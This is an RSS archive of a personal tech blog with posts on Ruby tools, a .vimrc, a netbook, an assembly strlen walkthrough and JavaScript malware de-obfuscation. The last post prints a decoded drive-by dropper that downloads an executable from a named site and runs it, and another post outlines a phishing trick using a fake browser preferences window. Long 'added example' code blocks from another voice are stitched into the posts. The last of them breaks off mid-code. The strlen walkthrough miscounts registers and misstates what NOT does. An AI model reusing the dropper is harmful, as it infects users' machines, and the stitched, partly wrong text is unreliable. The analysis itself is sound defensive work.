:wq - blog » Uncategorized, http://writequit.org/blog, "Tu fui, ego eris", Mon, 22 Dec 2014 14:54:59 +0000

Labview_rails and development motivation
http://writequit.org/blog/2009/03/19/labview_rails-and-development-motivation/ (Thu, 19 Mar 2009 20:24:22 +0000)

Alright, my wife has been trying to convince me that I should share the one-off I wrote for our internal lab management, so today I finally got around to fixing the last *major* bug in the system, and putting it up on github.

Yep, that’s right, you too can have a quasi-specialized lab management Ruby on Rails application to manage all the machines in your lab!


What I do hope that this does is inspire me to become a better Rails developer. I’ve been using Ruby for over a year now, I am extremely confident in my Ruby skills, and I’ve made many things I consider useful for myself and maybe for other people. Labview was my first real Rails project, and by first “real” project, I mean the first one that I use every day, that other people in my office use, and that I feel halfway confident releasing for people to see.

On the other hand, the testing is lacking, documentation is poor and some of the authentication systems are kind of hacked together. I’m labeling this one a “learning experience” and moving on. I probably won’t commit any more to Labview (but that doesn’t mean I wouldn’t be open if someone wanted to fork it on Github…) simply because right now it works well enough.

Oh yea, and I can’t thank my wife Delilah enough for the better visual design. You should have seen Labview back when it was hacked together in PHP. It was a pastel assault on the eyes.

Anywho, Labview is a really simple project, and a great start for someone interested in getting into Rails. I’ve learned a lot from developing it, and a lot of the knowledge has immediately been applied in some other projects I’m working on. Perhaps the next Rails app I work on will conform to test-driven development? I’m looking forward to other projects I have ideas for in the future :)

I’m also excited about taking a look at Sinatra, since Atmos did a talk on it last night at the Ruby meetup. Specifically, I’m interested to see if I can build an ssh-tunneling server using only Sinatra and Ruby over HTTP…

From Newsbeuter to Instapaper with the Ruby RicePaper library
http://writequit.org/blog/2009/03/03/from-newsbeuter-to-instapaper-with-the-ruby-ricepaper-library/ (Tue, 03 Mar 2009 23:39:46 +0000)

I love Instapaper, a truly elegant solution without any needless over-architecting. I use it every day, for queuing up articles to read during a lull in the workflow around here.

However, I’ve had an extra step in my article reading, since I read my RSS feeds in Newsbeuter: I normally have to open the feed in Newsbeuter, open it in the browser, use the bookmarklet to add it to Instapaper, then close the tab (until I want to read the article later). Well, no more!

Enough introduction; I haven’t posted nearly enough on here lately, so I wanted to share a little library I’m working on called RicePaper. It’s a simple Ruby library/CLI tool for submitting URLs to Instapaper. I’ve started a github project for it, go check it out or download the file directly. RicePaper requires the HTTParty gem (which you can install using “sudo gem install httparty” on a system with Ruby installed). RicePaper works extremely easily from the command line, like so:

% ./ricepaper.rb -u user@mydomain.com -p mypassword -t "The IWishI site" "http://iwishi.org"

The -t “<title>” option is optional, Instapaper will attempt to find a title for the article without it. You can also use ricepaper from any Ruby code (if you’re a Ruby scripter) as a library by using this little code:

require 'ricepaper'
# Credentials are passed as strings
rp = RicePaper.new("user@email.com", "password")
# Add a URL with an explicit title...
rp.add("http://www.asdf.com", "The ASDF site")
# ...or let Instapaper work out the title itself
rp.add("http://www.google.com")

It’s extremely simple to use.

Anyway, back to what I was originally going to use it for: bookmarking a URL directly from Newsbeuter. For that, we’ll need a “glue” script, like this (I named mine ricepaper.sh):

#!/bin/bash
# Newsbeuter runs this as its bookmark-cmd with the URL in $1 and the title in $2

# Change these to be your instapaper credentials
USERNAME=email@domain.com
PASSWORD=yourpassword
# Where the ricepaper executable is located
RICEPAPER=ricepaper

# If the title is non-empty, set it (variables are quoted so that
# spaces in the title or password don't split into extra arguments)
if [ -n "$2" ]; then
    "$RICEPAPER" -u "$USERNAME" -p "$PASSWORD" -t "$2" "$1" > /dev/null &
else
    "$RICEPAPER" -u "$USERNAME" -p "$PASSWORD" "$1" > /dev/null &
fi

# Exit correctly, either way
exit 0

Watch out for the quotes in the script above, sometimes wordpress makes them “special” quotes, which confuses the bash interpreter.

Replace the username and password with your Instapaper credentials and put in the correct location of the ricepaper Ruby executable, then save the script, chmod +x it and put it in your path somewhere.

Only one step left, which is to add this line to your ~/.newsbeuter/config file:

bookmark-cmd  ricepaper.sh

What happens now is that when you bookmark an article in Newsbeuter, it calls ricepaper.sh with the URL and title of the article, so whatever you set the bookmark’s title to is the title that shows up on Instapaper. Voila!
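A hardened version of the glue script, added here as an example (this is not the post’s script): credentials are read from a mode-600 file instead of being hard-coded, the URL newsbeuter hands over is checked to be http(s) before anything runs, and the arguments are built positionally so a title with spaces survives. The file name in RICEPAPER_CREDS and the function names are this example’s own assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: a hardened newsbeuter bookmark-cmd
# wrapper around the ricepaper CLI. Assumed names: RICEPAPER_CREDS (credential
# file with two lines, username then password), creds_ok, url_ok and
# ricepaper_bookmark are this example's own.

RICEPAPER="${RICEPAPER:-ricepaper}"
RICEPAPER_CREDS="${RICEPAPER_CREDS:-$HOME/.ricepaper_creds}"

# creds_ok FILE: succeed only if FILE is a regular file readable by its owner alone.
creds_ok() {
    f="$1"
    [ -f "$f" ] || return 1
    # GNU stat and BSD stat spell the "octal mode" format differently; try both.
    mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f" 2>/dev/null) || return 1
    case "$mode" in
        600|400) return 0 ;;
        *)       return 1 ;;
    esac
}

# url_ok URL: succeed only for http:// or https:// URLs without whitespace, so a
# feed entry cannot hand the CLI a file: path or smuggle in extra arguments.
url_ok() {
    case "$1" in
        http://*|https://*) ;;
        *) return 1 ;;
    esac
    case "$1" in
        *[[:space:]]*) return 1 ;;
    esac
    return 0
}

# ricepaper_bookmark URL [TITLE]: what newsbeuter's bookmark-cmd ends up calling.
# Exit status: 0 submitted, 2 bad URL, 3 unusable credential file.
ricepaper_bookmark() {
    url="$1"
    title="$2"
    url_ok "$url"               || { echo "ricepaper: refusing non-http(s) URL" >&2; return 2; }
    creds_ok "$RICEPAPER_CREDS" || { echo "ricepaper: credential file missing or too open" >&2; return 3; }
    { read -r user; read -r pass; } < "$RICEPAPER_CREDS"
    set -- -u "$user" -p "$pass"
    [ -n "$title" ] && set -- "$@" -t "$title"
    set -- "$@" "$url"
    # The ricepaper CLI only accepts the password as an argument, so it is still
    # visible in ps for the duration of the upload; not backgrounding the call
    # keeps that window as short as the upload itself.
    "$RICEPAPER" "$@" > /dev/null
}

# When invoked by newsbeuter, the URL and title arrive as $1 and $2.
if [ "${1:-}" ]; then
    ricepaper_bookmark "$1" "${2:-}"
fi
```

Create the credential file with `umask 077` (or `chmod 600` afterwards) and point `bookmark-cmd` at this script instead of the one above.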


Feel free to email if you have any questions about using the script(s). Hope you enjoy!

Switching from MacBook Pro to an ASUS EeePC
http://writequit.org/blog/2008/12/03/switching-from-macbook-pro-to-an-asus-eeepc/ (Wed, 03 Dec 2008 17:55:22 +0000)

Well, the display on my Macbook Pro finally decided to die on me, for no apparent reason (I was just sitting in bed, listening to some music when it died). So, I decided that rather than pay for a repair, I’d continue to use the MacBook as a desktop with an external display, and get a tiny netbook for day-to-day use (because I need a laptop to carry, go to coffeeshops with and generally use).

I ended up going with the EeePC (The 1000H model), because I could get the entire laptop for only a little more than repairing the screen of my MacBook (and a brand new Mac is terribly expensive). I’ve been playing with my new netbook for about a week now, and I thought I’d share some of my experiences.

The EeePC came with Windows XP preinstalled, so I promptly partitioned it down to 25g for Windows, 40g for Music and the rest (~90g) for Ubuntu-eee. I decided to go with Ubuntu-eee because of the custom kernel that supported the hardware out of the box without fiddling around. While I really really enjoy fiddling to get stuff to work, I don’t want to have to fiddle just to be able to get a working machine, especially when I’m somewhere I need to actually do some work. I almost immediately switched from the user-friendly Netbook remix interface to a classic Gnome interface, but I could see how it would be really nice for someone newer to Linux.

Here’s some of the key things (?) about my new EeePC (and Ubuntu-eee):

  • I like how portable this is, it’s definitely lighter than my MacBook Pro
  • It’s not ridiculously expensive like a Mac is ;)
  • I like Linux, since I tend to do all of my development on *nix systems, it’s great to have one as a main machine.
  • 1024×600 is very small, especially coming from 1440×900. This is helped by fullscreen mode in things like Firefox (with Vimperator for even more screen space) and Gnome Terminal.
  • Wifi and networking work great, this has always been shaky on Linux systems, I’m glad that I don’t have to fiddle for 20 minutes just to join a coffeeshop’s hotspot
  • Suspend and Hibernate work great, also a big feature, especially since Apple’s sleep feature spoiled me to never turn my Mac off.
  • I don’t like some of the trackpad stuff. It’s difficult to turn off the tap-to-click, attempting to install packages to manage it disables the vertical 2-finger scrolling, and it’s _insanely_ sensitive (the pad; the buttons themselves are kind of stiff).
  • The keyboard is great, since I got the 10″, it’s not small enough to bother me during coding sessions, which I’m sure the 8.9″ would have.
  • This machine definitely has less power than I’m used to, but I make up for it by doing a lot of resource-intensive stuff on my home machine over SSH, which makes up for it.
  • Con: Linux twitter clients suck. Adobe AIR clients take a ton of resources also.
  • Con: Linux sound stuff still sucks, it struggles with 2 processes attempting to share the sound device using ALSA.

I would definitely _not_ recommend this device to anyone with ailing eyesight, I tend to use 8 or 9pt font for everything, and I could definitely see some eye strain for anyone who has vision trouble. Don’t get one for your grandparents unless you don’t plan on much screen space being usable (or don’t do everything in the console, like I do :) ).

And, since I like pictures, here’s a few pictures of my new machine:

Compiling inavd server on FreeBSD
http://writequit.org/blog/2008/10/14/compiling-inavd-server-on-freebsd/ (Tue, 14 Oct 2008 15:52:06 +0000)

Just a short post: working through some of the modules I received, I ran into the inav module. Turns out that inavd doesn’t compile very nicely on FreeBSD, so I patched it. Previously, when trying to compile, you got:

c++ -ggdb -g3 -D INAV_VERSION= -c sniffer.cpp
In file included from sniffer.cpp:34:
/usr/include/netinet/ip.h:162: error: 'n_long' does not name a type
/usr/include/netinet/ip.h:165: error: 'n_long' does not name a type
*** Error code 1

So, download the inav-server-0.3.6-freebsd.patch into the directory where you untarred the server and issue the following commands:

cd <dir where you untarred INAV tarball>
patch -p1 < inav-server-0.3.6-freebsd.patch
cd server
make

Right now the patch is very unclean, and making the unitTests doesn’t work, but it does compile inavd and allows you to run the server on FreeBSD. Enjoy!

Vim setup explained
http://writequit.org/blog/2008/09/14/vim-setup-explained/ (Mon, 15 Sep 2008 01:18:49 +0000)

Since my site is named after a Vim command, I figured that I should eventually write something talking about my favorite text editor, and how I like it configured. What follows is the explanation of my .vimrc, as well as a description of the plugins that I use. A lot of the credit for this configuration goes to Bart Trojanowski, who has an excellent Vim configuration. At the bottom I’ll have a link to download any of the files themselves if you so desire. I hope you find it useful (everything in fixed-width font is the actual text, everything else is comments about it):

My ~/.vimrc:

Modelines have been abused in the past, and while I haven’t heard of anything lately that would abuse them, it’s always better safe than sorry. This requires the securemodelines vim script.

" ---------------------------------------------------------------------------
" first the disabled features due to security concerns
set modelines=0               " no modelines [http://www.guninski.com/vim1.html]
let g:secure_modelines_verbose=0 " securemodelines vimscript
let g:secure_modelines_modelines = 15 " 15 available modelines

Since these are all simple features, I won’t bother to explain them besides the inline comments:

" ---------------------------------------------------------------------------
" operational settings
syntax on
set ruler                     " show the line number on the bar
set more                      " use more prompt
set autoread                  " watch for file changes
set number                    " line numbers
set hidden
set noautowrite               " don't automagically write on :next
set lazyredraw                " don't redraw when don't have to
set showmode
set showcmd
set nocompatible              " vim, not vi
set autoindent smartindent    " auto/smart indent
set expandtab                 " expand tabs to spaces
set smarttab                  " tab and backspace are smart
set tabstop=6                 " 6 spaces
set shiftwidth=6
set scrolloff=5               " keep at least 5 lines above/below
set sidescrolloff=5           " keep at least 5 lines left/right
set backspace=indent,eol,start
set showfulltag               " show full completion tags
set noerrorbells              " no error bells please
set linebreak
set cmdheight=2               " command line two lines high
set undolevels=1000           " 1000 undos
set updatecount=100           " switch every 100 chars
set complete=.,w,b,u,U,t,i,d  " do lots of scanning on tab completion
set ttyfast                   " we have a fast terminal
filetype on                   " Enable filetype detection
filetype indent on            " Enable filetype-specific indenting
filetype plugin on            " Enable filetype-specific plugins
compiler ruby                 " Enable compiler support for ruby
set wildmode=longest:full
set wildignore+=*.o,*~,.lo    " ignore object files
set wildmenu                  " menu has tab completion
let maplocalleader=','        " all my macros start with ,
set foldmethod=syntax         " fold on syntax automagically, always
set foldcolumn=2              " 2 lines of column for fold showing, always

set dictionary=/usr/share/dict/words " more words!

I do like candycode for my terminals (which tend to be black) and I like macvim for my GUI, so I change schemes depending on which I’m using.

if !has("gui_running")
      colorscheme candycode   " yum candy
end
if has("gui_running")
      colorscheme macvim      " macvim == win
      set guioptions-=T       " no toolbar
      set cursorline          " show the cursor line
end

For the taglist plugin, I want it to appear on the right and to quit vim as soon as I close the last file I’m working on.

" Settings for taglist.vim
let Tlist_Use_Right_Window=1
let Tlist_Auto_Open=0
let Tlist_Enable_Fold_Column=0
let Tlist_Compact_Format=0
let Tlist_WinWidth=28
let Tlist_Exit_OnlyWindow=1
let Tlist_File_Fold_Auto_Close = 1

Misc TOhtml settings

" Settings for :TOhtml
let html_number_lines=1
let html_use_css=1
let use_xhtml=1

My status line is basically <filename> [<filetype>] [+] #<buffernum> <linenum>/<totallines>,<columnnum>

" ---------------------------------------------------------------------------
" status line
set laststatus=2
if has('statusline')
        function! SetStatusLineStyle()
                let &stl="%f %y "                       .
                        \"%([%R%M]%)"                   .
                        \"%#StatusLineNC#%{&ff=='unix'?'':&ff.'\ format'}%*" .
                        \"%{'$'[!&list]}"               .
                        \"%{'~'[&pm=='']}"              .
                        \"%="                           .
                        \"#%n %l/%L,%c%V "              .
                        \""
        endfunc
        call SetStatusLineStyle()

        if has('title')
                set titlestring=%t%(\ [%R%M]%)
        endif

endif

More simple search options, see inline comments

" ---------------------------------------------------------------------------
"  searching
set incsearch                 " incremental search
set ignorecase                " search ignoring case
set hlsearch                  " highlight the search
set showmatch                 " show matching bracket
set diffopt=filler,iwhite       " ignore all whitespace and sync

I *occasionally* use the mouse. If I have to.

" ---------------------------------------------------------------------------
"  mouse stuffs
set mouse=a                   " mouse support in all modes
set mousehide                 " hide the mouse when typing
" this makes the mouse paste a block of text without formatting it
" (good for code)
map <MouseMiddle> <esc>"*p

I prefer not to litter my current directory with backup files, so I put them all in ~/.backup. I also save a lot of line positions in the viminfo file.

" ---------------------------------------------------------------------------
"  backup options
set backup
set backupdir=~/.backup
set viminfo=%100,'100,/100,h,\"500,:100,n~/.viminfo
set history=200
"set viminfo='100,f1

I use ,ss to toggle between spellcheck on and spellcheck off.

" ---------------------------------------------------------------------------
" spelling...
if v:version >= 700

  setlocal spell spelllang=en
  nmap <LocalLeader>ss :set spell!<CR>

endif

Here are all the keyboard shortcuts I use most often:

" ---------------------------------------------------------------------------
" some useful mappings
" Y yanks from cursor to $
map Y y$
" for yankring to work with previous mapping:
function! YRRunAfterMaps()
    nnoremap Y   :<C-U>YRYankCount 'y$'<CR>
endfunction
" toggle list mode
nmap <LocalLeader>tl :set list!<cr>
" toggle paste mode
nmap <LocalLeader>pp :set paste!<cr>
" change directory to that of current file
nmap <LocalLeader>cd :cd%:p:h<cr>
" change local directory to that of current file
nmap <LocalLeader>lcd :lcd%:p:h<cr>
" correct type-o's on exit
nmap q: :q
" save and build
nmap <LocalLeader>wm  :w<cr>:make<cr>
" open all folds
nmap <LocalLeader>fo  :%foldopen!<cr>
" close all folds
nmap <LocalLeader>fc  :%foldclose!<cr>
" ,tt will toggle taglist on and off
nmap <LocalLeader>tt :Tlist<cr>
" ,nn will toggle NERDTree on and off
nmap <LocalLeader>nn :NERDTreeToggle<cr>
" When I'm pretty sure that the first suggestion is correct
map <LocalLeader>r 1z=

I use this one quite often, as I often forget to do “sudo vim file” in the first case, now I don’t have to exit vim to write the file with sudo.

" If I forgot to sudo vim a file, write it through sudo tee with :w!!
" (":w !cmd" pipes the buffer to cmd and leaves the buffer alone; "%!cmd"
" would instead replace the buffer with cmd's output, which is empty here
" because stdout is redirected to /dev/null)
cmap w!! w !sudo tee > /dev/null %
" ruby helpers
iab rbang #!/usr/bin/env ruby
iab idef def initialize

I think candycode looks good in all the color modes, but it’s still nice to set it up for different terms.

" ---------------------------------------------------------------------------
" setup for the visual environment
if $TERM =~ '^xterm'
        set t_Co=256
elseif $TERM =~ '^screen-bce'
        set t_Co=256            " just guessing
elseif $TERM =~ '^rxvt'
        set t_Co=88
elseif $TERM =~ '^linux'
        set t_Co=8
else
        set t_Co=16
endif

Switch between tabs with ,tn and ,tp

" ---------------------------------------------------------------------------
" tabs
" (LocalLeader is ",")
map <LocalLeader>tc :tabnew %<cr>    " create a new tab
map <LocalLeader>td :tabclose<cr>    " close a tab
map <LocalLeader>tn :tabnext<cr>     " next tab
map <LocalLeader>tp :tabprev<cr>     " previous tab
map <LocalLeader>tm :tabmove         " move a tab to a new location

Load extensions we need and change some format options for markdown files.

" ---------------------------------------------------------------------------
" auto load extensions for different file types
if has('autocmd')
        filetype plugin indent on
        syntax on

        autocmd BufReadPost *
                \ if line("'\"") > 0|
                \       if line("'\"") <= line("$")|
                \               exe("norm '\"")|
                \       else|
                \               exe "norm $"|
                \       endif|
                \ endif

        " improve legibility
        au BufRead quickfix setlocal nobuflisted wrap number

        " improved formatting for markdown
        " http://plasticboy.com/markdown-vim-mode/
        autocmd BufRead *.mkd  set ai formatoptions=tcroqn2 comments=n:>
        autocmd BufRead ~/.blog/entries/*  set ai formatoptions=tcroqn2 comments=n:>
endif

And that’s the .vimrc.

Here are some of the plugins that I use:
  • NERD Commenter – auto comment sections of code
  • NERD Tree – display file tree for directories, like a project view
  • Alternate – Alternate between implementation and header files
  • Compview – Search for a word and display a window with results
  • GetLatestVimScript – Get the latest version of scripts
  • Matchit – Extended % matching
  • Rails – Tons of RoR stuff
  • Securemodelines – Secure modeline support
  • Taglist – display a list of tags from the file
  • VCScommand – help with files under revision control
  • Vimball – install vimball plugins
  • Yankring – have a ring of copy/paste buffers for history pasting
  • C – A collection of helpful things for C (Although mine is heavily customized)

Enough with text, here’s a couple of screenshots of how it looks:


I maintain a pretty-up-to-date copy of most of my configuration files in my github dotfile repository, that’s the best way to get this configuration as well as all the plugins that I use, you can download a tarball of all the files from the github (direct link: here) page as well.

Well, hope someone out there finds these configuration files useful. I welcome any feedback :)

Soon to come: an explanation of the project that I’ve been working on that has taken me away from blogging for so long, an Intrusion Detection System based on Locality events.

Update 10/23/08: After some theme changes, updated screenshot (no NERDtree or taglist shown in the image):

Update 12/9/09: Been over a year, just for a teaser of what it looks like now:


Firefox/Safari on OSX’s keyboard annoyances
http://writequit.org/blog/2008/08/21/firefoxsafari-on-osxs-keyboard-annoyances/ (Thu, 21 Aug 2008 17:19:18 +0000)

I use keyboard shortcuts. A lot. So much in fact, that I find it incredibly annoying when websites create their own keyboard shortcuts for their pages. Most wiki-type pages (Wikipedia, Trac, Twiki) all use keyboard shortcuts on their sites.

I am a firm believer that application-level keybindings should always take precedence over website keybindings, no matter what. Not only is this in line with the conceptual view of how the two interact, but it’s better for security reasons. Take, for example, the keyboard shortcut to access the preferences for almost all applications on OSX: Apple+, (or CMD).

Why stop with usability features like focusing the find box? Why not overwrite the keyboard shortcut for accessing the preferences for a browser, and trick the website user into clicking on something he or she should not be clicking on? (Note that it requires javascript. Firefox’s popup blocker will catch it, but Safari’s does not; it also looks more realistic in Safari.)

Here’s an example, a page that I’m hosting (it doesn’t do anything malicious ;) )

Use CMD+, to open the preferences for either safari or firefox, I used firefox for this example, but I could just have easily used safari. I mocked this up in about 5 minutes, I could easily have opened a page instead of just an image also.

Did you see the fake preferences window? Now tell me how many people (non-technical users) would immediately know that this window was not the real preferences window for Firefox? What if the website had a “How-to” guide for setting a Firefox preference, and encouraged the user to “Press CMD+, to open the preferences, then click on <blah> and type <blah>”. If the website showed a picture of a false preferences panel and said “It’s perfectly normal for firefox preferences to ask for your password, enter it into the box on the ‘Security’ tab”, how many users might be tricked into doing that? You could write a guide for setting a preference that was actually a phishing site.

Come on browser devs, don’t let javascript steal ALL the shortcuts; at least don’t pass browser-specific shortcuts to the site BEFORE handling them. (Or make it an option you have to turn on?)

Thoughts? What do you think, should websites have the ability to capture keystrokes? Should browser developers pass things through? What about a site-(white|black)list for keyboard shortcuts?

Inline strlen function in assembly
http://writequit.org/blog/2008/06/06/inline-strlen-function-in-assembly/ (Fri, 06 Jun 2008 17:40:58 +0000)

I know the strlen function in assembly has been covered on the internet before, but I figured I’d cover it again, just in case someone like myself were searching google for it ;). Here’s the code:

00404334 sub_404334 proc near
00404334  push edi
00404335  push eax
00404336  push ecx
00404337  mov edi, edx
00404339  xor eax, eax
0040433B  repne scasb
0040433D  jnz short loc_404341
0040433F  not ecx
00404341 loc_404341:
00404341  pop eax
00404342  add ecx, eax
00404344  pop eax
00404345  pop edi
00404346  jmp sub_4041BC
00404346 sub_404334 endp

The inputs for this function come from edx and ecx: edx holds a pointer to our string (in this example, the string is the location of the Windows directory, so I’m going to say it’s “C:\Windows”), and ecx holds the maximum length of the string, which is 256 in this example. This is important, as ecx is used as a countdown while the string is checked. Let’s go line-by-line:

00404334  push edi
00404335  push eax
00404336  push ecx

These 3 lines just save the variables to the stack so they’re not overwritten, standard stuff.

00404337  mov edi, edx
00404339  xor eax, eax

edx (which is an LPCSTR pointing to “C:\Windows”) is moved into edi (you’ll see why in a second). Eax is XOR’d with itself to reset it to 0. The next instruction compares each character in the string with al, so essentially it’s searching for the NULL character '\0'.

0040433B  repne scasb

This instruction works from the beginning of edi, comparing each character of the string to whatever is in al (which is '\0', NULL, right now). It decrements ecx for every character it compares (scans). If it does not find a match (repne: repeat while not equal), it moves to the next character. In our example “C:\Windows” (terminated by NULL, like a good string should be), ecx will decrease from 256 to 246 (C – 256, : – 255, \ – 254, W – 253, i – 252, n – 251, d – 250, o – 249, w – 248, s – 247, \0 – 246)

0040433D  jnz short loc_404341

If the scan ran out of characters (ecx reached 0) without finding a NULL byte, jump to location 0x404341. In our example, the jump is not taken.

0040433F  not ecx

Flip all the bits in ecx, since ecx will be treated as a signed number, this makes ecx = -ecx. Note that if the end of the string is reached (ecx = 0), this instruction would be skipped by the jump in the previous instruction. In our example however, ecx becomes -246 (or 0xFFFFFF09).

00404341 loc_404341:
00404341  pop eax
00404342  add ecx, eax

Ecx’s starting value (256, remember?) is popped back into eax. Eax is then added to ecx and the result is stored in ecx. Therefore:

eax = 256
ecx = ecx + eax
ecx = -246 + 256
ecx = 10

The length of the string now resides in ecx, we can restore our original registers and jump away in the ending instructions:

00404344  pop eax
00404345  pop edi
00404346  jmp sub_4041BC

And that is one way to get the length of a string in assembly.
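A C model of sub_404334, added here as an example (not code from the original post): it executes the same steps as the listing (repne scasb, jnz, not, add) on a plain byte buffer and records the intermediate register values, so the count left by the scan and the effect of NOT (one’s complement, i.e. -ecx - 1) can be checked against the walkthrough above. It also covers the case the walkthrough skips over: a buffer with no NULL inside the ecx limit. The names ScanTrace and scan_strlen* are this example’s own.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example, not from the original post: a C model of sub_404334 that
 * runs the same steps and exposes the intermediate register values.
 * Names (ScanTrace, scan_strlen_trace, scan_strlen) are this example's own. */

typedef struct {
    int      found_nul;      /* ZF after repne scasb: 1 if a NUL was hit */
    uint32_t ecx_after_scan; /* ecx at the moment repne scasb stops */
    uint32_t ecx_after_not;  /* ecx after "not ecx" (unchanged when jnz is taken) */
    uint32_t length;         /* ecx after "add ecx, eax": the routine's result */
} ScanTrace;

/* s plays edx (pointer to the buffer); max_len plays the caller's ecx. */
ScanTrace scan_strlen_trace(const char *s, uint32_t max_len) {
    ScanTrace t;
    const unsigned char *edi = (const unsigned char *)s; /* mov edi, edx */
    uint8_t  al  = 0;                                    /* xor eax, eax */
    uint32_t ecx = max_len;                              /* ecx as pushed */
    int zf = 0;

    /* repne scasb: stop when ecx hits 0 or when *edi == al. The decrement
     * also happens on the iteration that finds the NUL, so for "C:\Windows"
     * (10 characters plus the terminator) ecx ends at 256 - 11 = 245. */
    while (ecx != 0) {
        zf = (*edi == al);
        edi++;
        ecx--;
        if (zf) break;
    }
    t.found_nul = zf;
    t.ecx_after_scan = ecx;

    /* jnz short loc_404341: skip the NOT when the scan ran out without a NUL. */
    if (zf) {
        ecx = ~ecx; /* one's complement: -ecx - 1, e.g. ~245 == 0xFFFFFF0A == -246 */
    }
    t.ecx_after_not = ecx;

    /* pop eax (the saved max_len); add ecx, eax. Wraps mod 2^32 like the CPU,
     * so 0xFFFFFF0A + 256 == 10. */
    ecx += max_len;
    t.length = ecx;
    return t;
}

/* Convenience wrapper: just the value the routine leaves in ecx. */
uint32_t scan_strlen(const char *s, uint32_t max_len) {
    return scan_strlen_trace(s, max_len).length;
}

int main(void) {
    ScanTrace t = scan_strlen_trace("C:\\Windows", 256);
    printf("found_nul=%d ecx_after_scan=%u ecx_after_not=0x%08X length=%u\n",
           t.found_nul, t.ecx_after_scan, (unsigned)t.ecx_after_not, t.length);
    /* Caveat: with no NUL inside max_len bytes the result equals max_len, which
     * is indistinguishable from a string of exactly max_len characters, so a
     * caller must treat "length == limit" as "possibly unterminated". */
    printf("unterminated 'abcdef' with limit 4: %u\n", scan_strlen("abcdef", 4));
    printf("exactly 4 chars 'abcd' with limit 4: %u\n", scan_strlen("abcd", 4));
    return 0;
}
```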

 

Quick javascript de-obfuscation with python
http://writequit.org/blog/2008/06/05/quick-javascript-de-obfuscation-with-python/ (Thu, 05 Jun 2008 22:44:59 +0000)

Scholar was kind enough to allow me to post his/her obfuscated javascript. Here’s a quick rundown. The page was originally this:

<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 =  str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

(line breaks in the str variable added so it’s actually readable). Looks like this script uses the same XOR method as the script I posted about previously. This script is actually trivial to de-obfuscate using python (I <3 ruby, but ruby doesn’t like strings with #{} in them, so it was easier just to use python instead):

shell> python
>>> str = <long-string-from-above-pasted-here>
>>> str2 = ""
>>> for i in range(0, len(str)):
...     str2 = str2 + chr(ord(str[i]) ^ 1)
...

str2 now contains the de-obfuscated javascript, which after inserting line breaks, looks something like this:

poexali();
function poexali() {
 var ender = document.createElement('object');
 ender.setAttribute('id','ender');
 ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
 try {
  var asq = ender.CreateObject('msxml2.XMLHTTP','');
  var ass = ender.CreateObject("Shell.Application",'');
  var asst = ender.CreateObject('adodb.stream','');
  try {
   asst.type = 1;
   asq.open('GET','http://worldchinesewriters.com//load.php',false);
   asq.send();
   asst.open();
   asst.Write(asq.responseBody);
   var imya = './/..//svchosts.exe';
   asst.SaveToFile(imya,2);
   asst.Close();
  } catch(e) {}
  try {
   ass.shellexecute(imya);
  } catch(e) {}
 }catch(e){}
}

Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php and save it into the local file “svchosts.exe”, then execute the file.

Super-quick post, since lately I seem to be a tad verbose. What “svchosts.exe” does is left as an exercise to the reader :)
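The same technique, generalised a step beyond the post: instead of assuming the XOR key is 1, try every single-byte key and keep the one that produces the most JavaScript-looking text, then pull the URLs out of the result in defanged form for a write-up. This is an added example, not the post’s code; the sample script below is constructed for the demo and points at a placeholder host.

```python
"""Added example, not from the original post: recover the single-byte XOR key
of an obfuscated script like the one above instead of assuming it is 1, then
decode it and pull out (defanged) URLs for a report. The sample script below
is constructed for the demo and points at a placeholder host."""
import re

# Tokens that a decoded JavaScript dropper is likely to contain.
JS_TOKENS = ("function", "var ", "try", "catch", "document", "eval", "(", ";", "{")


def xor_decode(data, key):
    """Same transform as the page's loop: XOR every character with key."""
    return "".join(chr(ord(ch) ^ key) for ch in data)


def score_js(text):
    """Heuristic: -1 if the text contains non-printable characters, otherwise
    the number of JavaScript tokens it contains."""
    for ch in text:
        code = ord(ch)
        if code > 126 or (code < 32 and ch not in "\r\n\t"):
            return -1
    return sum(text.count(tok) for tok in JS_TOKENS)


def recover_key(data, keys=range(1, 256)):
    """Try every single-byte key and return the one that decodes data into the
    most JavaScript-looking text (0 if nothing decodes to printable text)."""
    best_key, best_score = 0, -1
    for key in keys:
        score = score_js(xor_decode(data, key))
        if score > best_score:
            best_key, best_score = key, score
    return best_key


def extract_urls(js):
    """Find http(s) URLs in decoded script and defang them (http -> hxxp)."""
    urls = re.findall(r"https?://[^\s'\"<>]+", js)
    return ["hxxp" + u[4:] for u in urls]


def deobfuscate(data):
    """Full pipeline: key recovery, decoding, URL extraction."""
    key = recover_key(data)
    decoded = xor_decode(data, key) if key else ""
    return key, decoded, extract_urls(decoded)


# Constructed sample: a dropper-shaped script with a placeholder host, encoded
# with the same key (1) that the page's script used.
SAMPLE_JS = (
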